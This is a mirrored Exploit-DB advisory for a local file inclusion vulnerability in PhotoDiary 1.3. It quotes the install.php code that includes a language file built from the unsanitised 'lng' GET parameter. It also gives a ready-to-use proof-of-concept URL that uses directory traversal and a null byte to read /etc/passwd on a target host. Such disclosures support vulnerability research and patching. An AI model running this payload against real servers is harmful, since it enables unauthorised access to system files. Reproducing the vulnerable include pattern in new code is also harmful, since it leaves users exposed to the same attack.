bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/10869.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

20 lines
No EOL
429 B
Text
Raw Blame History

PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability
Discovered by cOndemned
download: http://code.google.com/p/photodiary/
source of /admin/install.php (lines 9 - 15):
if (isset($_GET['lng'])){
$LNG = $_GET['lng']; # 1
} else {
$LNG = "ITA";
}
include "../common/language_".$LNG.".php"; # 2
proof of concept:
http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00
Reference in a new issue View git blame Copy permalink